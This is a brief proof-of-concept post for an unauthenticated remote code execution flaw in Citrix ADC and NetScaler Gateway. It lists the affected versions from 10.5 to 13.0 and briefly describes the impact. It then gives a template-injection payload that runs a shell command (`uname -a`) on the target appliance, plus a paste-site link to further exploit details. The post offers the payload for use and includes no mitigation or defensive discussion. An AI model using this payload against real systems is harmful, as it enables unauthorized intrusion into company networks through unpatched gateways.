Poc: Citrix ADC and NetScaler Remote Code Execution
Vulnerable version:
Citrix ADC and Citrix Gateway version 13.0
Citrix ADC and NetScaler Gateway version 12.1
Citrix ADC and NetScaler Gateway version 12.0
Citrix ADC and NetScaler Gateway version 11.1
Citrix NetScaler ADC and NetScaler Gateway version 10.5
Details:
Digital workspace and enterprise networks vendor Citrix has announced a critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. If exploited, it could allow unauthenticated attackers to gain remote access to a company’s local network and carry out arbitrary code execution.
Payload:
[% template.new('BLOCK' ='print `uname -a`') %]
Exploit Details:
https://hastebin.com/raw/ecaxahewur